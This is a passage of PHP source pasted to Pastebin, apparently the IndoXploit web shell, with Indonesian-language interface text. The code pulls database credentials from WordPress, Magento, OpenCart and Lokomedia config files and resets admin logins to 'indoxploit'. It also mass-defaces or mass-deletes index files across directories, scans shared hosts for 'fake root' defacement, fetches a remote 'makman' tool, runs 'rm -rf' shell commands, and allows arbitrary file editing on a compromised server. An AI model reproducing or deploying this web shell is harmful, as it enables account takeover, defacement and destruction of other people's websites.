  1450.                                 $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  1451.                             }
  1452.                             $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  1453.                             print "Config => ".$file_conf."<br>";
  1454.                             print "CMS => Wordpress<br>";
  1455.                             print $url_target;
  1456.                             if(!$update OR !$conn OR !$db) {
  1457.                                 print "Status => ".color(1, 1, mysql_error())."<br><br>";
  1458.                             }
  1459.                             else {
  1460.                                 print "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."<br><br>";
  1461.                             }
  1462.                             mysql_close($conn);
  1463.                         }
  1464.                         elseif(preg_match("/Magento|Mage_Core/",$config)) {
  1465.                             $dbhost = getValue($config,"<host><![CDATA[","]]></host>");
  1466.                             $dbuser = getValue($config,"<username><![CDATA[","]]></username>");
  1467.                             $dbpass = getValue($config,"<password><![CDATA[","]]></password>");
  1468.                             $dbname = getValue($config,"<dbname><![CDATA[","]]></dbname>");
  1469.                             $dbprefix = getValue($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  1470.                             $prefix = $dbprefix."admin_user";
  1471.                             $option = $dbprefix."core_config_data";
  1472.                             $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1473.                             $db = mysql_select_db($dbname);
  1474.                             $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1475.                             $result = mysql_fetch_array($q);
  1476.                             $id = $result[user_id];
  1477.                             $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  1478.                             $result2 = mysql_fetch_array($q2);
  1479.                             $target = $result2[value];
  1480.                             if($target == '') {
  1481.                                 $url_target = "Login => ".color(1, 1, "Cant't get domain name")."<br>";
  1482.                             }
  1483.                             else {
  1484.                                 $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  1485.                             }
  1486.                             $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  1487.                             print "Config => ".$file_conf."<br>";
  1488.                             print "CMS => Magento<br>";
  1489.                             print $url_target;
  1490.                             if(!$update OR !$conn OR !$db) {
  1491.                                 print "Status => ".color(1, 1, mysql_error())."<br><br>";
  1492.                             }
  1493.                             else {
  1494.                                 print "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."<br><br>";
  1495.                             }
  1496.                             mysql_close($conn);
  1497.                         } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  1498.                             $dbhost = getValue($config,"'DB_HOSTNAME', '","'");
  1499.                             $dbuser = getValue($config,"'DB_USERNAME', '","'");
  1500.                             $dbpass = getValue($config,"'DB_PASSWORD', '","'");
  1501.                             $dbname = getValue($config,"'DB_DATABASE', '","'");
  1502.                             $dbprefix = getValue($config,"'DB_PREFIX', '","'");
  1503.                             $prefix = $dbprefix."user";
  1504.                             $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1505.                             $db = mysql_select_db($dbname);
  1506.                             $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1507.                             $result = mysql_fetch_array($q);
  1508.                             $id = $result[user_id];
  1509.                             $target = getValue($config,"HTTP_SERVER', '","'");
  1510.                             if($target == '') {
  1511.                                 $url_target = "Login => ".color(1, 1, "Cant't get domain name")."<br>";
  1512.                             }
  1513.                             else {
  1514.                                 $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  1515.                             }
  1516.                             $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  1517.                             print "Config => ".$file_conf."<br>";
  1518.                             print "CMS => OpenCart<br>";
  1519.                             print $url_target;
  1520.                             if(!$update OR !$conn OR !$db) {
  1521.                                 print "Status => ".color(1, 1, mysql_error())."<br><br>";
  1522.                             }
  1523.                             else {
  1524.                                 print "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."<br><br>";
  1525.                             }
  1526.                             mysql_close($conn);
  1527.                         }
  1528.                         elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  1529.                             $dbhost = getValue($config,'server = "','"');
  1530.                             $dbuser = getValue($config,'username = "','"');
  1531.                             $dbpass = getValue($config,'password = "','"');
  1532.                             $dbname = getValue($config,'database = "','"');
  1533.                             $prefix = "users";
  1534.                             $option = "identitas";
  1535.                             $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1536.                             $db = mysql_select_db($dbname);
  1537.                             $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  1538.                             $result = mysql_fetch_array($q);
  1539.                             $target = $result[alamat_website];
  1540.                             if($target == '') {
  1541.                                 $target2 = $result[url];
  1542.                                 $url_target = "Login => ".color(1, 1, "Cant't get domain name")."<br>";
  1543.                                 if($target2 == '') {
  1544.                                     $url_target2 = "Login => ".color(1, 1, "Cant't get domain name")."<br>";
  1545.                                 }
  1546.                                 else {
  1547.                                     $cek_login3 = file_get_contents("$target2/adminweb/");
  1548.                                     $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  1549.                                     if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  1550.                                         $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  1551.                                     }
  1552.                                     elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  1553.                                         $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  1554.                                     }
  1555.                                     else {
  1556.                                         $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  1557.                                     }
  1558.                                 }
  1559.                             } else {
  1560.                                 $cek_login = file_get_contents("$target/adminweb/");
  1561.                                 $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  1562.                                 if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  1563.                                     $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  1564.                                 }
  1565.                                 elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  1566.                                     $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  1567.                                 }
  1568.                                 else {
  1569.                                     $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  1570.                                 }
  1571.                             }
  1572.                             $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  1573.                             print "Config => ".$file_conf."<br>";
  1574.                             print "CMS => Lokomedia<br>";
  1575.                             if(preg_match("/Can't get domain name/", $url_target)) {
  1576.                                 print $url_target2;
  1577.                             }
  1578.                             else {
  1579.                                 print $url_target;
  1580.                             }
  1581.                             if(!$update OR !$conn OR !$db) {
  1582.                                 print "Status => ".color(1, 1, mysql_error())."<br><br>";
  1583.                             }
  1584.                             else {
  1585.                                 print "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."<br><br>";
  1586.                             }
  1587.                             mysql_close($conn);
  1588.                         }
  1589.                     }
  1590.                 }
  1591.             }
  1592.             else {
  1593.                 print "<center>
  1594.                 <h1>Mass Password Change</h1>
  1595.                 <form method='post'>
  1596.                 <input type='radio' name='config_type' value='dir' checked>DIR Config<input type='radio' name='config_type' value='link'>LINK Config<br>
  1597.                 <input type='text' size='50' name='config_dir' value='".path()."'><br><br>
  1598.                 Set User & Pass: <br>
  1599.                 <input type='text' name='user_baru' value='indoxploit' placeholder='user_baru'><br>
  1600.                 <input type='text' name='pass_baru' value='indoxploit' placeholder='pass_baru'><br>
  1601.                 <input style='background: transparent; color: #ffffff; border: 1px solid #ffffff; width: 215px; margin: 5px auto;' type='submit' name='hajar' value='Hajar!'>
  1602.                 </form></center>";
  1603.             }
  1604.         }
  1605.         elseif($_GET['do'] === "mass") {
  1606.             if($_POST['start']) {
  1607.                 if($_POST['mass_type'] === 'singledir') {
  1608.                     print "<div style='margin: 5px auto; padding: 5px'>";
  1609.                     massdeface($_POST['d_dir'], $_POST['script'], $_POST['d_file']);
  1610.                     print "</div>";
  1611.                 }
  1612.                 elseif($_POST['mass_type'] === 'alldir') {
  1613.                     print "<div style='margin: 5px auto; padding: 5px'>";
  1614.                     massdeface($_POST['d_dir'], $_POST['script'], $_POST['d_file'], "-alldir");
  1615.                     print "</div>";
  1616.                 }
  1617.                 elseif($_POST['mass_type'] === "delete") {
  1618.                     print "<div style='margin: 5px auto; padding: 5px'>";
  1619.                     massdelete($_POST['d_dir'], $_POST['d_file']);
  1620.                     print "</div>";
  1621.                 }
  1622.             }
  1623.             else {
  1624.                 print "<center><form method='post'>
  1625.                        <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
  1626.                        <input type='radio' name='mass_type' value='singledir' checked>Mass Deface Single Directory<input type='radio' name='mass_type' value='alldir'>Mass Deface All Directory<input type='radio' name='mass_type' value='delete'>Mass Delete File<br>
  1627.                        <span>( kosongkan 'Index File' jika memilih Mass Delete File )</span><br><br>
  1628.                        <font style='text-decoration: underline;'>Folder:</font><br>
  1629.                        <input type='text' name='d_dir' value='".path()."' style='width: 450px;' height='10'><br><br>
  1630.                        <font style='text-decoration: underline;'>Filename:</font><br>
  1631.                        <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br><br>
  1632.                        <font style='text-decoration: underline;'>Index File:</font><br>
  1633.                        <textarea name='script' style='width: 450px; height: 200px;'>Hacked by IndoXploit</textarea><br>
  1634.                        <input style='background: transparent; color: #ffffff; border: 1px solid #ffffff; width: 460px; margin: 5px auto;' type='submit' name='start' value='Mass'>
  1635.                        </form></center>";
  1636.             }
  1637.         }
  1638.         elseif($_GET['do'] == 'fakeroot') {
  1639.             ob_start();
  1640.  
  1641.             $site = explode("\r\n", $_POST['url']);
  1642.             $user = usergroup()->name;
  1643.             $file = $_POST['file'];
  1644.  
  1645.             if(!preg_match("#/home/$user/public_html#", $_SERVER['DOCUMENT_ROOT'])) die(color(1, 1, "I think this server not using shared host :("));
  1646.            
  1647.            
  1648.             if($_POST['reverse']) {
  1649.                 if(!is_writable($_SERVER['DOCUMENT_ROOT'])) die(color(1, 1, "Directory '".$_SERVER['DOCUMENT_ROOT']."' is not writeable."));
  1650.                 if(!is_writable(dirname($_SERVER['DOCUMENT_ROOT']))) die(color(1, 1, "Directory '".dirname($_SERVER['DOCUMENT_ROOT'])."' is not writeable."));
  1651.  
  1652.                 save($_SERVER['DOCUMENT_ROOT']."/".$file, "w", $_POST['script']);
  1653.                 save(dirname($_SERVER['DOCUMENT_ROOT'])."/".$file, "w", $_POST['script']);
  1654.  
  1655.                 foreach($site as $url) {
  1656.                     $cek = curl("$url/~$user/$file");
  1657.                     if(preg_match("/hacked/i", $cek)) {
  1658.                         print "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
  1659.                     }
  1660.                 }
  1661.             } else {
  1662.                 print "<center><form method='post'>
  1663.                 Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
  1664.                 User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
  1665.                 Domain: <br>
  1666.                 <textarea style='width: 450px; height: 250px;' name='url'>";
  1667.                 print implode("\n", reverse());
  1668.                 print "</textarea><br>
  1669.                 <font style='text-decoration: underline;'>Index File:</font><br>
  1670.                 <textarea name='script' style='width: 450px; height: 200px;'>Hacked by IndoXploit</textarea><br>
  1671.                 <input style='background: transparent; color: #ffffff; border: 1px solid #ffffff; width: 460px; margin: 5px auto;' type='submit' name='reverse' value='Scan Fake Root!'>
  1672.                 </form><br>
  1673.                 NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
  1674.             }
  1675.         }
  1676.         elseif($_GET['do'] === 'lre') {
  1677.             if(file_exists("makman.php")) {
  1678.                 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/makman.php' frameborder='0' scrolling='yes'></iframe>";
  1679.             }
  1680.             else {
  1681.                 if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create file 'Makman'."));
  1682.                 if(getfile("LRE")) {
  1683.                     print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/makman.php' frameborder='0' scrolling='yes'></iframe>";
  1684.                 }
  1685.                 else {
  1686.                     print color(1, 1, "Error while downloading file makman.");
  1687.                     @unlink("makman.php");
  1688.                 }
  1689.             }
  1690.  
  1691.         }
  1692.     }
  1693.     elseif(isset($_GET['act'])) {
  1694.         if($_GET['act'] === 'newfile') {
  1695.             if($_POST['save']) {
  1696.                 $filename = htmlspecialchars($_POST['filename']);
  1697.                 $fopen    = fopen($filename, "a+");
  1698.                 if($fopen) {
  1699.                     $act = "<script>window.location='?act=edit&dir=".path()."&file=".$_POST['filename']."';</script>";
  1700.                 }
  1701.                 else {
  1702.                     $act = color(1, 1, "Permission Denied!");
  1703.                 }
  1704.             }
  1705.             print $act;
  1706.             print "<form method='post'>
  1707.             Filename: <input type='text' name='filename' value='".path()."/newfile.php' style='width: 450px;' height='10'>
  1708.             <input type='submit' class='input' name='save' value='SUBMIT'>
  1709.             </form>";
  1710.         }
  1711.         elseif($_GET['act'] === 'newfolder') {
  1712.             if($_POST['save']) {
  1713.                 $foldername = path().'/'.htmlspecialchars($_POST['foldername']);
  1714.                 if(!@mkdir($foldername)) {
  1715.                     $act = color(1, 1, "Permission Denied!");
  1716.                 }
  1717.                 else {
  1718.                     $act = "<script>window.location='?dir=".path()."';</script>";
  1719.                 }
  1720.             }
  1721.             print $act;
  1722.             print "<form method='post'>
  1723.             Folder Name: <input type='text' name='foldername' style='width: 450px;' height='10'>
  1724.             <input type='submit' class='input' name='save' value='SUBMIT'>
  1725.             </form>";
  1726.         }
  1727.         elseif($_GET['act'] === 'rename_folder') {
  1728.             if($_POST['save']) {
  1729.                 $rename_folder = rename(path(), "".dirname(path()).DIRECTORY_SEPARATOR.htmlspecialchars($_POST['foldername']));
  1730.                 if($rename_folder) {
  1731.                     $act = "<script>window.location='?dir=".dirname(path())."';</script>";
  1732.                 }
  1733.                 else {
  1734.                     $act = color(1, 1, "Permission Denied!");
  1735.                 }
  1736.             print "$act<br>";
  1737.             }
  1738.             print "<form method='post'>
  1739.             <input type='text' value='".basename(path())."' name='foldername' style='width: 450px;' height='10'>
  1740.             <input type='submit' class='input' name='save' value='RENAME'>
  1741.             </form>";
  1742.         }
  1743.         elseif($_GET['act'] === 'delete_folder') {
  1744.             if(is_dir(path())) {
  1745.                 if(is_writable(path())) {
  1746.                     @rmdir(path());
  1747.                     if(!@rmdir(path()) AND OS() === "Linux") @exe("rm -rf ".path());
  1748.                     if(!@rmdir(path()) AND OS() === "Windows") @exe("rmdir /s /q ".path());
  1749.                     $act = "<script>window.location='?dir=".dirname(path())."';</script>";
  1750.                 }
  1751.                 else {
  1752.                     $act = color(1, 1, "Could not remove directory '".basename(path())."'");
  1753.                 }
  1754.             }
  1755.             print $act;
  1756.         }
  1757.         elseif($_GET['act'] === 'view') {
  1758.             print "Filename: ".color(1, 2, basename($_GET['file']))." [".writeable($_GET['file'], perms($_GET['file']))."]<br>";
  1759.             print "[ <a href='?act=view&dir=".path()."&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=".path()."&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=".path()."&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=".path()."&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=".path()."&file=".$_GET['file']."'>delete</a> ]<br>";
  1760.             print "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  1761.         }
  1762.         elseif($_GET['act'] === 'edit') {
  1763.             if($_POST['save']) {
  1764.                 $save = file_put_contents($_GET['file'], $_POST['src']);
  1765.                 if($save) {
  1766.                     $act = color(1, 2, "File Saved!");
  1767.                 }
  1768.                 else {
  1769.                     $act = color(1, 1, "Permission Denied!");
  1770.                 }
  1771.                 print "$act<br>";
  1772.             }
  1773.  
  1774.             print "Filename: ".color(1, 2, basename($_GET['file']))." [".writeable($_GET['file'], perms($_GET['file']))."]<br>";
  1775.             print "[ <a href='?act=view&dir=".path()."&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=".path()."&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=".path()."&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=".path()."&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=".path()."&file=".$_GET['file']."'>delete</a> ]<br>";
  1776.             print "<form method='post'>
  1777.             <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  1778.             <input type='submit' class='input' value='SAVE' name='save' style='width: 500px;'>
  1779.             </form>";
  1780.         }
  1781.         elseif($_GET['act'] === 'rename') {
  1782.             if($_POST['save']) {
  1783.                 $rename = rename($_GET['file'], path().DIRECTORY_SEPARATOR.htmlspecialchars($_POST['filename']));
  1784.                 if($rename) {
  1785.                     $act = "<script>window.location='?dir=".path()."';</script>";
  1786.                 }
  1787.                 else {
  1788.                     $act = color(1, 1, "Permission Denied!");
  1789.                 }
  1790.                 print "$act<br>";
  1791.             }
  1792.  
  1793.             print "Filename: ".color(1, 2, basename($_GET['file']))." [".writeable($_GET['file'], perms($_GET['file']))."]<br>";
  1794.             print "[ <a href='?act=view&dir=".path()."&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=".path()."&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=".path()."&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=".path()."&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=".path()."&file=".$_GET['file']."'>delete</a> ]<br>";
  1795.             print "<form method='post'>
  1796.             <input type='text' value='".basename($_GET['file'])."' name='filename' style='width: 450px;' height='10'>
  1797.             <input type='submit' class='input' name='save' value='RENAME'>
  1798.             </form>";
  1799.         }
  1800.         elseif($_GET['act'] === 'delete') {
  1801.             $delete = unlink($_GET['file']);
  1802.             if($delete) {
  1803.                 $act = "<script>window.location='?dir=".path()."';</script>";
  1804.             }
  1805.             else {
  1806.                 $act = color(1, 1, "Permission Denied!");
  1807.             }
  1808.             print $act;
  1809.         }
  1810.     }
  1811.     else {
  1812.         files_and_folder();
  1813.     }
  1814. }
  1815.  
  1816. serverinfo();
  1817. action();
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top